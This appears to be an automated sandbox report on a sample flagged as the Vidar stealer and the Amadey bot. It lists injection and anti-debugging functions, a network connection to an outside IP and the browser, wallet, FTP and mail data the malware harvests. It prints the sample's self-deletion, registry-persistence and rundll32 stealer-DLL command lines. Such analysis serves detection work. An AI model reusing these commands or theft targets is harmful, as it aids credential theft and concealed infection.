                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 6680 Thread sleep time: -13620000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 6804 Thread sleep count: 252 > 30
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 6804 Thread sleep time: -15120000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 6732 Thread sleep count: 309 > 30
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 6732 Thread sleep time: -18540000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 4864 Thread sleep time: -30000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 6680 Thread sleep time: -60000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 6804 Thread sleep time: -60000s >= -30000s
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Last function: Thread delayed
                              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Last function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Last function: Thread delayed
                              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_0045C719 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0045C844h 0_2_0045C719
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_0040657E __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,0_2_0040657E
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_00404905 __EH_prolog3,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose,0_2_00404905
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_0045F3B6 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,0_2_0045F3B6
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_00405437 __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,0_2_00405437
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_0040F7AE _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,0_2_0040F7AE
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_0040F998 __EH_prolog3,__wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,0_2_0040F998
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_00419F82 FindFirstFileExW,5_2_00419F82
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_0211A1D2 FindFirstFileExW,5_2_0211A1D2
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Code function: 10_2_00419F82 FindFirstFileExW,10_2_00419F82
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Code function: 10_2_0223A1D2 FindFirstFileExW,10_2_0223A1D2
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_00406917 _strtok,_strtok,__wgetenv,__wgetenv,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,0_2_00406917
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_0042F155 GetSystemInfo,0_2_0042F155
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Thread delayed: delay time: 30000
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Thread delayed: delay time: 60000
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Thread delayed: delay time: 60000
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Thread delayed: delay time: 60000
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Thread delayed: delay time: 30000
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Thread delayed: delay time: 60000
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Thread delayed: delay time: 60000
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                              Source: reg.exe, 0000000F.00000002.724315962.00000000038C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700263265.000000000085B000.00000004.00000001.sdmp, blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                              Source: reg.exe, 0000000F.00000002.724315962.00000000038C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                              Source: reg.exe, 0000000F.00000002.724315962.00000000038C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                              Source: rundll32.exe, 00000015.00000002.924514689.00000000027AA000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: reg.exe, 0000000F.00000002.724315962.00000000038C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Process information queried: ProcessInformation
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_00413948 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00413948
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_0040EBA8 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,FreeLibrary,0_2_0040EBA8
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_004000A5 mov eax, dword ptr fs:[00000030h] 0_2_004000A5
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_00411081 mov eax, dword ptr fs:[00000030h] 5_2_00411081
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_00414E12 mov eax, dword ptr fs:[00000030h] 5_2_00414E12
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_0210092B mov eax, dword ptr fs:[00000030h] 5_2_0210092B
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_021112D1 mov eax, dword ptr fs:[00000030h] 5_2_021112D1
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_02115062 mov eax, dword ptr fs:[00000030h] 5_2_02115062
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_02100D90 mov eax, dword ptr fs:[00000030h] 5_2_02100D90
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Code function: 10_2_00411081 mov eax, dword ptr fs:[00000030h] 10_2_00411081
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Code function: 10_2_00414E12 mov eax, dword ptr fs:[00000030h] 10_2_00414E12
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Code function: 10_2_022312D1 mov eax, dword ptr fs:[00000030h] 10_2_022312D1
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Code function: 10_2_02235062 mov eax, dword ptr fs:[00000030h] 10_2_02235062
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Code function: 10_2_0222092B mov eax, dword ptr fs:[00000030h] 10_2_0222092B
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Code function: 10_2_02220D90 mov eax, dword ptr fs:[00000030h] 10_2_02220D90
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_00408B9A GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,0_2_00408B9A
                              Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_00413948 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00413948
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_0040F2C2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0040F2C2
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_0040F427 SetUnhandledExceptionFilter,5_2_0040F427
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_0040F673 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040F673
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_02113B98 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_02113B98
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_0210F8C3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0210F8C3
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_0210F512 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0210F512
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Code function: 10_2_00413948 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00413948
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Code function: 10_2_0040F2C2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0040F2C2
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Code function: 10_2_0040F427 SetUnhandledExceptionFilter,10_2_0040F427
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Code function: 10_2_0040F673 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0040F673
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Code function: 10_2_02233B98 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_02233B98
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Code function: 10_2_0222F8C3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0222F8C3
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Code function: 10_2_0222F512 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0222F512

                              HIPS / PFW / Operating System Protection Evasion:

                              System process connects to network (likely due to code injection or exploit)
                              Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 192.168.2.4 80
                              Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 176.111.174.114 80
                              Contains functionality to inject code into remote processes
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_004020D0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,5_2_004020D0
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Code function: 5_2_02102AF0 ShellExecuteA,5_2_02102AF0
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Process created: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe 'C:\ProgramData\M7WCJ84VE5TXJ0R4.exe'
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im wKYTg7Gp6P.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\wKYTg7Gp6P.exe' & del C:\ProgramData\*.dll & exit
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe Process created: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe 'C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe'
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im wKYTg7Gp6P.exe /f
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\cred.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\scr.dll, Main
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im wKYTg7Gp6P.exe /f
                              Source: blfte.exe, 0000000A.00000002.924480417.0000000000E10000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.924714424.0000000002AA0000.00000002.00000001.sdmp Binary or memory string: Program Manager
                              Source: blfte.exe, 0000000A.00000002.924480417.0000000000E10000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.924714424.0000000002AA0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
                              Source: blfte.exe, 0000000A.00000002.924480417.0000000000E10000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.924714424.0000000002AA0000.00000002.00000001.sdmp Binary or memory string: Progman
                              Source: blfte.exe, 0000000A.00000002.924480417.0000000000E10000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.924714424.0000000002AA0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_0040F0E2 cpuid 5_2_0040F0E2
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: __EH_prolog3,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,_memset,LocalFree,0_2_0045C719
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: GetLocaleInfoA,0_2_00466103
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_004743A2
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_00474690
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\Autofill\Google Chrome_Default.txt VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\CC\Google Chrome_Default.txt VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\Cookies\Edge_Cookies.txt VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\Cookies\Google Chrome_Default.txt VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\Cookies\IE_Cookies.txt VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\Files\Default.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\History\Google Chrome_Default.txt VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\information.txt VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\passwords.txt VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\screenshot.jpg VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeQueries volume information: C:\ProgramData\1a9f26b569d5df\cred.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeQueries volume information: C:\ProgramData\1a9f26b569d5df\cred.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeQueries volume information: C:\ProgramData\1a9f26b569d5df\scr.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeQueries volume information: C:\ProgramData\1a9f26b569d5df\scr.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0045C662 __EH_prolog3_GS,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,0_2_0045C662
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0045C174 GetUserNameA,0_2_0045C174
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0045C662 __EH_prolog3_GS,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,0_2_0045C662
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_00403C30 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetSystemMetrics,5_2_00403C30
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Stealing of Sensitive Information:

                              Yara detected Amadey bot
                              Source: Yara match File source: dump.pcap, type: PCAP
                              Source: Yara match File source: 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmp, type: MEMORY
                              Source: Yara match File source: Process Memory Space: blfte.exe PID: 5756, type: MEMORY
                              Yara detected Amadeys stealer DLL
                              Source: Yara match File source: dump.pcap, type: PCAP
                              Source: Yara match File source: C:\ProgramData\1a9f26b569d5df\cred.dll, type: DROPPED
                              Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred[1].dll, type: DROPPED
                              Yara detected Vidar stealer
                              Source: Yara match File source: 00000000.00000003.659819807.0000000002250000.00000004.00000001.sdmp, type: MEMORY
                              Source: Yara match File source: 00000000.00000002.700376910.0000000002180000.00000040.00000001.sdmp, type: MEMORY
                              Source: Yara match File source: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                              Source: Yara match File source: Process Memory Space: wKYTg7Gp6P.exe PID: 6924, type: MEMORY
                              Source: Yara match File source: 0.2.wKYTg7Gp6P.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 0.3.wKYTg7Gp6P.exe.2250000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 0.3.wKYTg7Gp6P.exe.2250000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 0.2.wKYTg7Gp6P.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 0.2.wKYTg7Gp6P.exe.2180e50.1.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 0.2.wKYTg7Gp6P.exe.2180e50.1.raw.unpack, type: UNPACKEDPE
                              Found many strings related to Crypto-Wallets (likely being stolen)
                              Source: wKYTg7Gp6P.exe String found in binary or memory: ElectrumLTC
                              Source: wKYTg7Gp6P.exe String found in binary or memory: \ElectronCash\wallets\
                              Source: wKYTg7Gp6P.exe String found in binary or memory: \Electrum\wallets\
                              Source: wKYTg7Gp6P.exe String found in binary or memory: \jaxx\Local Storage\
                              Source: wKYTg7Gp6P.exe String found in binary or memory: window-state.json
                              Source: wKYTg7Gp6P.exe String found in binary or memory: exodus.conf.json
                              Source: wKYTg7Gp6P.exe String found in binary or memory: info.seco
                              Source: wKYTg7Gp6P.exe String found in binary or memory: \Exodus\exodus.wallet\
                              Source: wKYTg7Gp6P.exe String found in binary or memory: ElectrumLTC
                              Source: wKYTg7Gp6P.exe String found in binary or memory: \jaxx\Local Storage\
                              Source: wKYTg7Gp6P.exe String found in binary or memory: passphrase.json
                              Source: wKYTg7Gp6P.exe String found in binary or memory: \Ethereum\
                              Source: wKYTg7Gp6P.exe String found in binary or memory: \Exodus\exodus.wallet\
                              Source: wKYTg7Gp6P.exe String found in binary or memory: file__0.localstorage
                              Source: wKYTg7Gp6P.exe String found in binary or memory: default_wallet
                              Source: wKYTg7Gp6P.exe String found in binary or memory: \Ethereum\
                              Source: wKYTg7Gp6P.exe String found in binary or memory: \MultiDoge\
                              Source: wKYTg7Gp6P.exe String found in binary or memory: \Exodus\exodus.wallet\
                              Source: wKYTg7Gp6P.exe String found in binary or memory: seed.seco
                              Source: wKYTg7Gp6P.exe String found in binary or memory: keystore
                              Source: wKYTg7Gp6P.exe String found in binary or memory: \Electrum-LTC\wallets\
                              Tries to harvest and steal Bitcoin Wallet information
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                              Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
                              Tries to harvest and steal browser information (history, passwords, etc)
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Tries to harvest and steal ftp login credentials
                              Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
                              Tries to steal Crypto Currency WalletsShow sources
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\?????? Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\?????? Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\??????????Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\??????????Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\????Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\????Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\????Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\????Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\??rJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\??rJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\????Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\????Jump to behavior
                              Tries to steal Instant Messenger accounts or passwordsShow sources
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
                              Tries to steal Mail credentials (via file access)Show sources
                              Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                              Source: Yara matchFile source: Process Memory Space: wKYTg7Gp6P.exe PID: 6924, type: MEMORY

                              Remote Access Functionality:

Yara detected Vidar stealer
Source: Yara match, File source: 00000000.00000003.659819807.0000000002250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.700376910.0000000002180000.00000040.00000001.sdmp, type: MEMORY
